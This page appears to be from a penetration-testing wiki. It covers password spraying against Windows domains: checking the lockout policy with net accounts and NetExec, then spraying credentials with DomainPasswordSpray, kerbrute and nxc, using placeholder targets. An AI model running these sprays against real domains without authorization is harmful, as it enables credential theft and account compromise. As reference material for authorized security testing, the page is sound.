Password Spray

Accounts can be locked during the process. Always check the password policy before starting the attack.

Password Policy

Checking password policy is important for creating a sufficient wordlist. also, it is important to look for the Lockout threshold in order to avoid account lockouts during the brute-force.

Retrieve the password policy:

net accounts

using NetExec:

nxc smb <ip_address> -u <username> -p <pass> --pass-pol

PowerShell Script

LogoGitHub - dafthack/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!GitHub
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

Kerbrute

If valid usernames are known, perform a password spray to find weak passwords:

kerbrute passwordspray <username_list> <password> -d <domain_name> --dc <dc_ip>
Password spray using kerbrute

NXC

Another method to spray passwords, particularly targeting various services:

nxc <service> <target> -u <username_list> -p <password> --continue-on-success
Password spray using nxc

PreviousKerberoastingNextSilver Ticket

Last updated